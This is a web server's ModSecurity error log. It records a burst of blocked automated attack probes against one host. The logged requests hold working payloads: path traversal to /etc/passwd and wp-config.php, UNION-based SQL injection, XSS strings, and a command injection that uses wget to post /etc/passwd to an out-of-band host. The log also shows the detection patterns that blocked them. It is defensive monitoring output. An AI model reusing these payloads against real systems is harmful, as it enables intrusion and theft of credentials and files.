[Tue Aug 29 11:46:34.425193 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:InternalFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:InternalFile: ../../../../../../../../../../../../../../Windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/"] [unique_id "ZO14KsCo-f0AAAjM6@YAAAAT"]
[Tue Aug 29 11:46:35.435650 2023] [:error] [pid 2131] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:REINDEX:phpcli. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x22<? found within ARGS:REINDEX:phpcli: echo \\x22<?php phpinfo();\\x22 > /var/www/html/magmi/web/info.php; php "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/magmi/web/magmi_saveprofile.php"] [unique_id "ZO14K8Co-f0AAAhT35cAAAAD"]
[Tue Aug 29 11:46:39.472119 2023] [:error] [pid 2137] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:file: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/usr-cgi/logdownload.cgi"] [unique_id "ZO14L8Co-f0AAAhZRq4AAAAG"]
[Tue Aug 29 11:46:41.432510 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../ found within ARGS:name: /../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/webapi/file/transfer"] [unique_id "ZO14McCo-f0AAAhl0EwAAAAi"]
[Tue Aug 29 11:46:42.497451 2023] [:error] [pid 2239] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:username: {{username}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfeb.unla.ac.id"] [uri "/admin/ajax.php"] [unique_id "ZO14MsCo-f0AAAi-RFoAAAAH"]
[Tue Aug 29 11:46:43.671785 2023] [:error] [pid 2137] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:id: -1 union select 1,md5(999999999),3,4,5-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/admin/manage_user.php"] [unique_id "ZO14M8Co-f0AAAhZRrsAAAAG"]
[Tue Aug 29 11:46:47.376309 2023] [:error] [pid 2239] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:refurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: }}}; found within ARGS:refurl: }}};alert(document.domain)//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/owa/auth/frowny.aspx"] [unique_id "ZO14N8Co-f0AAAi-RGQAAAAH"]
[Tue Aug 29 11:46:49.683758 2023] [:error] [pid 2131] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: UNION SELECT found within ARGS:id: -1 UNION SELECT 1,md5(999999999),3,4,5,6,7,8--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14OcCo-f0AAAhT37wAAAAD"]
[Tue Aug 29 11:46:51.416039 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/sites/all/modules/avatar_uploader/lib/demo/view.php"] [unique_id "ZO14O8Co-f0AAAjCa-8AAAAB"]
[Tue Aug 29 11:46:57.498894 2023] [:error] [pid 2168] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/cgi-bin/execute_cmd.cgi"] [unique_id "ZO14QcCo-f0AAAh4DhkAAAA2"]
[Tue Aug 29 11:47:00.474514 2023] [:error] [pid 2113] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14RMCo-f0AAAhBSKsAAAAX"]
[Tue Aug 29 11:47:01.366808 2023] [:error] [pid 1988] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:href. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:href: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php"] [unique_id "ZO14RcCo-f0AAAfECBgAAAAO"]
[Tue Aug 29 11:47:02.436567 2023] [:error] [pid 2263] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:partcode. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22);{/ found within ARGS:partcode: {dede:field name='source' runphp='yes'}echo md5(\\x22CVE-2018-7700\\x22);{/dede:field}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/tag_test_action.php"] [unique_id "ZO14RsCo-f0AAAjXsgIAAAAG"]
[Tue Aug 29 11:47:03.427711 2023] [:error] [pid 2276] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:likebtn_q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:likebtn_q: aHR0cDovL2xpa2VidG4uY29tLm9hc3QubWU=\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO14R8Co-f0AAAjkM0MAAAAI"]
[Tue Aug 29 11:47:05.405102 2023] [:error] [pid 2251] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:filename: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/download"] [unique_id "ZO14ScCo-f0AAAjL8SsAAAAR"]
[Tue Aug 29 11:47:06.364752 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Rule 7fe1c6360a88 [id "981242"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "237"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "digilibfeb.unla.ac.id"] [uri "/cgi-bin/readycloud_control.cgi"] [unique_id "ZO14SsCo-f0AAAjM7DIAAAAT"]
[Tue Aug 29 11:47:06.364842 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Rule 7fe1c5ef2158 [id "981247"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "243"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "digilibfeb.unla.ac.id"] [uri "/cgi-bin/readycloud_control.cgi"] [unique_id "ZO14SsCo-f0AAAjM7DIAAAAT"]
[Tue Aug 29 11:47:07.359608 2023] [:error] [pid 2250] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:name[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:name[]: $(wget --post-file /etc/passwd cjmnbitjmimt14dgn26gai4q661sojft5.oast.site)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/api/getServices"] [unique_id "ZO14S8Co-f0AAAjKyvcAAAAQ"]
[Tue Aug 29 11:47:07.786970 2023] [:error] [pid 2282] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:open. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:open: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php"] [unique_id "ZO14S8Co-f0AAAjqDDUAAAAH"]
[Tue Aug 29 11:47:10.447856 2023] [:error] [pid 2131] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:value. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:value: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/api/change_setting"] [unique_id "ZO14TsCo-f0AAAhT3@IAAAAD"]
[Tue Aug 29 11:47:11.442758 2023] [:error] [pid 2165] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../ found within ARGS:fn: ../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/cs/career/getSurvey.jsp"] [unique_id "ZO14T8Co-f0AAAh1310AAAAz"]
[Tue Aug 29 11:47:13.376706 2023] [:error] [pid 2262] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:libpath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:libpath: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/sniplets/modules/syntax_highlight.php"] [unique_id "ZO14UcCo-f0AAAjW9CAAAAAA"]
[Tue Aug 29 11:47:14.369645 2023] [:error] [pid 2283] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14UsCo-f0AAAjrbG8AAAAP"]
[Tue Aug 29 11:47:15.496666 2023] [:error] [pid 2266] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:id: 6' UNION ALL SELECT md5('999999999'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/admin/requests/take_action.php"] [unique_id "ZO14U8Co-f0AAAjav1EAAAAV"]
[Tue Aug 29 11:47:15.936733 2023] [:error] [pid 2268] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:username: {{username}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfeb.unla.ac.id"] [uri "/admin/ajax.php"] [unique_id "ZO14U8Co-f0AAAjcHYMAAAAY"]
[Tue Aug 29 11:47:16.408881 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:id: -1 union select 1,2,3,4,5,6,md5(999999999),8,9,10,11-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/admin/manage_booking.php"] [unique_id "ZO14VMCo-f0AAAj112sAAAAa"]
[Tue Aug 29 11:47:18.458973 2023] [:error] [pid 2158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14VsCo-f0AAAhui74AAAAr"]
[Tue Aug 29 11:47:19.429533 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dt. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c found within ARGS:dt: \\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5cWindows\\x5c\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/XmlPeek.aspx"] [unique_id "ZO14V8Co-f0AAAjCbFMAAAAB"]
[Tue Aug 29 11:47:19.556233 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:search: Banking' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,md5(999999999),15,16,17,18,19-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14V8Co-f0AAAjCbFcAAAAB"]
[Tue Aug 29 11:47:22.367736 2023] [:error] [pid 2304] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{alert(document.domain)}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS_NAMES:{alert(document.domain)}: {alert(document.domain)}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfeb.unla.ac.id"] [uri "/"] [unique_id "ZO14WsCo-f0AAAkAL6AAAAAU"]
[Tue Aug 29 11:47:23.487351 2023] [:error] [pid 2283] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.action"] [unique_id "ZO14W8Co-f0AAAjrbH8AAAAP"]
[Tue Aug 29 11:47:25.392325 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keymap. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );>// found within ARGS:keymap: <svg/onload=confirm(document.domain);>//a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/crx/de/setPreferences.jsp;\\n.html"] [unique_id "ZO14XcCo-f0AAAjCbGEAAAAB"]
[Tue Aug 29 11:47:25.446637 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../ found within ARGS:file: /../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/components/com_moofaq/includes/file_includer.php"] [unique_id "ZO14XcCo-f0AAAjCbGMAAAAB"]
[Tue Aug 29 11:47:26.364836 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keymap. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );>// found within ARGS:keymap: <svg/onload=confirm(document.domain);>//a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/content/crx/de/setPreferences.jsp;\\n.html"] [unique_id "ZO14XsCo-f0AAAjCbGYAAAAB"]
[Tue Aug 29 11:47:27.399889 2023] [:error] [pid 2230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:ff. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:ff: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/knews/wysiwyg/fontpicker/"] [unique_id "ZO14X8Co-f0AAAi2yIIAAAAN"]
